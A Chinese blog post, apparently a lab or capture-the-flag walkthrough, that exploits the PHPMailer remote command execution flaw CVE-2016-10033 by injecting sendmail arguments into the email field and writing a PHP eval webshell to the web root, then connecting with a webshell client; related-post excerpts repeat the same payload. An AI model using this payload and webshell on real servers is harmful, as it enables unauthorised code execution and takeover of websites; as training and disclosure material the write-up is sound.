PHPMailer远程命令执行漏洞溯源

于 2023-08-29 14:27:56 发布
阅读量337 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2303_76679642/article/details/132560696
版权

PHPMailer是一个用于发送电子邮件的PHP函数包。直接用PHP就可以发送,无需搭建复杂的Email服务。相关漏洞CVE编号(CVE-2016-10033)

步骤1:进入靶场,利用bp抓包,发现与后台交互的文件

步骤2:进入之后看到下面的页面,很明显是一个功能点

步骤3:burp抓包,更改email处payload为"aaa". -OQueueDirectory=/tmp/. -X/var/www/html/1.php @aaa.com 更改message处payload为<?php @eval($_POST[cmd]);?>

 步骤4:利用哥斯拉连接,找到key值

 

 

Ran
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php查看邮件漏洞,PHPMailer任意文件读取漏洞分析(CVE-2017-5223)
weixin_42327291的博客
03-11 396
原标题:PHPMailer任意文件读取漏洞分析(CVE-2017-5223)PHPMailer是堪称全球最流行邮件发送类,其全球范围内的用户量大约有900万,被诸多开源项目所采用,包括WordPress、Drupal、1CRM、Joomla!等。铱迅安全团队于2017年1月6日发现PHPMailer <= 5.2.21版本存在任意文件读取漏洞,成功利用该漏洞,可获取服务器中的任意文件内容。目...
漏洞情报 | PHPMailer 多个远程代码执行漏洞
爱国小白帽
06-18 530
​ 点击上方 订阅话题 第一时间了解漏洞威胁 0x01 漏洞描述 PHPMailer是一个用于发送电子邮件的PHP类库。 2021年6月18日,360漏洞云监测到PHPMailer 6.5.0之前的版本存在多个远程代码执行漏洞。 CVE-2021-34551:该漏洞源于在处理$lang_path参数时对setLanguage()方法内用户提供数据的验证不足,远程攻击者可向应用传送一个特殊构造的输入,通过受影响的参数设置UNC路径,从而在系统上执行任意PHP代码。 CVE-2021-3603:该该漏洞
php mailer cve利用,CVE-2016-10033:PHPMailer漏洞利用
weixin_29421409的博客
03-28 363
原标题:CVE-2016-10033:PHPMailer漏洞利用Pr0.s说:MalwareBenchmark的“鬼”博士第一次出手写文章,尽管思维有点儿 跳跃, 但懂行的人会知道价值~!(*^__^*) 嘻嘻……PoC链接:漏洞成因分析: 上图是PHPMailer发送邮件时,关键函数的调用关系。mailSend方法中,Sender变换之后,得到$params,最终作为第五个参数传递给mailP...
PHPMailer远程命令执行漏洞复现
小小猪的博客
12-13 1469
PHPMailer远程命令执行漏洞复现 漏洞简介: PHPMailer是PHP电子邮件创建及传输类,用于多个开源项目:WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla!等。 PHPMailer < 5.2.18版本存在安全漏洞,可使未经身份验证的远程攻击者在Web服务器用户上下文中执行任意代码,远程控制目标web应用。 影响版本: PHPMailer<5.2.18 环境搭建: 这里采用现成靶机 漏洞复现: aaa "aaa". -O
php mailer类调用远程SMTP服务器发送邮件实现方法
10-22
主要介绍了php mailer类调用远程SMTP服务器发送邮件实现方法,结合实例形式分析了php mailer类的调用及邮件发送相关技巧,需要的朋友可以参考下
PHPMailer-6.2.0.zip
01-27
在此版本中,PHPMailer获得了官方的PHP 8兼容性;早期版本可在PHP 8预发行版中使用,但测试套件却不能。@jrfnl完成了所需的大量工作(它还恢复了在较旧的PHP版本上运行的测试)–非常感谢! PHP 8.0兼容性 从PHP CS...
PHPMailer-master
最新发布
07-01
接着运行`composer install`命令,这将自动下载并安装PHPMailer及其依赖。然后,你可以通过以下代码示例来学习如何使用PHPMailer发送邮件: ```php <?php require 'vendor/autoload.php'; use ...
PHPMailer邮件发送系统最新版本
02-28
PHPMailer是一款广泛使用的开源PHP邮件发送库,专为在PHP应用程序中发送电子邮件而设计。它提供了丰富的功能,包括SMTP验证、HTML邮件支持、附件上传、多语言支持等,使得开发者能够方便地构建复杂的邮件发送逻辑。 ...
phpmailer.zip
05-28
PHPMailer邮件发送详解》 在Web开发中,发送邮件是一项常见的需求,PHPMailer作为一个强大的PHP邮件发送类库,能够帮助开发者轻松实现这一功能。本文将深入探讨PHPMailer的使用方法,以及它如何通过`Email.php`和...
墨者PHPMailer远程命令执行漏洞溯源题解
zr1213159840的博客
01-07 453
打开环境后,给了一个页面,但是啥也没有,看不出来 对目录进行一下爆破试试,使用dirsearch,能看到有个mail.php 百度一下看下这个phpmailer有什么问题,发现存在命令执行漏洞,那么就是按照步骤跑就行了。 打开xxx/mail.php页面,在you name栏里面随便写啥,比如abc。在your email栏中填入:“aaa”. -OQueueDirectory=/tmp/. -X/var/www/html/a.php @ aaa.com 在your message中填入一句话木马 &
PHPMailer 任意文件读取漏洞(CVE-2017-5223)复现
SoulCat
05-29 1733
你剥开一个很酸的橙子而感到后悔了,可对于橙子来说,那是它的一切
PHPMailer任意文件读取漏洞及修复方案
10-21 408
漏洞描述: PHPMailer是全球最流行邮件发送类,其全球范围内的用户量大约有900万,被诸多开源项目所采用,包括WordPress、Drupal、1CRM、Joomla!等。PHPMailer <= 5.2.21版本存在任意文件读取漏洞(CVE-2017-5223),成功利用该漏洞,可获取服务器中的任意文件内容。 影响版本: PHPMailer <= 5.2.21 漏洞等级:高危...
PHPMailer曝远程代码执行高危漏洞(CVE-2016-10033)
Anprou的博客
12-27 2044
据说其全球范围内的用户量大约有900万——每天还在持续增多。
验证php的远程命令执行漏洞案例
Websec
09-17 2779
比如验证JBoss EJBInvokerServlet Marshalled Object RCE(CVE-2013-4810 ) 0x01:首先我们开启php的环境,如phpStudy,wamp等等,这里我们就使用phpStudy吧,进入php-5.5.38的目录(当前使用的这个php版本),将我们的test.php复制到这个目录即可  0x02:然后使用命令行进行验证即可,我们先进入到...
在线靶场-墨者-命令执行2星-PHPMailer远程命令执行漏洞溯源
weixin_42079912的博客
08-09 344
打开靶场网页,根据题意管理员留下的邮件测试页面。于是寻找邮件测试页面。 打开邮件测试页面。 使用邮件注入木马 You name:mozhe(随便输入) Your email:“abc”. -OQueueDirectory=/tmp/. -X/var/www/html/abc.php @abc.com(abc可更改) You message:<?php @eval($_POST[abc])...
(CVE-2016-10033)PHPMailer 远程代码执行漏洞
weixin_45253622的博客
06-23 2196
漏洞简介 PHPMailer是一个非常强大的 php发送邮件类,可以设定发送邮件地址、回复地址、邮件主题、html网页,上传附件,并且使用起来非常方便。 PHPMailer由于钓鱼系统sendmail命令,并且没有对输入做限制,攻击者可以通过利用 –X 参数把恶意代码写入 PHP 文件,达到执行命令的效果。 PHPMailer百度百科 利用条件 :PHP没有开启safe_mode(默认) 影响版本 :<5.2.18版本 漏洞复现 1.启动docker服务 service docker start 2
PHPMailer 安装
03-29
要安装 PHPMailer,请按以下步骤进行操作: 1. 下载 PHPMailer 您可以从 PHPMailer 的官方网站上下载最新版本的 PHPMailer,也可以使用 Composer 安装。在本教程中,我们将使用第一种方法。 2. 解压缩 PHPMailer 将下载的 PHPMailer 压缩文件解压缩到您的 Web 服务器上。 3. 包含 PHPMailer 在您的 PHP 文件中包含 PHPMailer 类。例如,如果您将 PHPMailer 解压缩到您的 Web 服务器的根目录中,则可以使用以下命令包含 PHPMailer: require_once '/path/to/PHPMailer/PHPMailerAutoload.php'; 4. 配置 PHPMailerPHPMailer 中配置您的 SMTP 设置和其他选项。例如,如果您使用 Gmail SMTP,您可以使用以下代码: $mail->isSMTP(); // 使用 SMTP $mail->Host = 'smtp.gmail.com'; // 您的 SMTP 服务器地址 $mail->SMTPAuth = true; // 启用 SMTP 认证 $mail->Username = 'your.email@gmail.com'; // 发件人邮箱地址 $mail->Password = 'your.email.password'; // 发件人邮箱密码 $mail->SMTPSecure = 'tls'; // 启用 TLS 加密,也可以使用 SSL 加密 $mail->Port = 587; // SMTP 端口号 5. 发送邮件 使用 PHPMailer 发送电子邮件。例如,以下代码将发送一封电子邮件: $mail = new PHPMailer(); // 实例化 PHPMailer $mail->setFrom('your.email@gmail.com', 'Your Name'); // 设置发件人邮箱地址和名称 $mail->addAddress('recipient.email@gmail.com', 'Recipient Name'); // 添加收件人邮箱地址和名称 $mail->Subject = 'Subject'; // 设置邮件主题 $mail->Body = 'Content'; // 设置邮件正文 if(!$mail->send()) { echo 'Error: ' . $mail->ErrorInfo; // 发送失败 } else { echo 'Message sent.'; // 发送成功 } 以上就是 PHPMailer 的安装过程。请注意,在生产环境中使用 PHPMailer 时,您应该采取一些安全措施,如使用 SMTP 认证和加密,以确保电子邮件的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值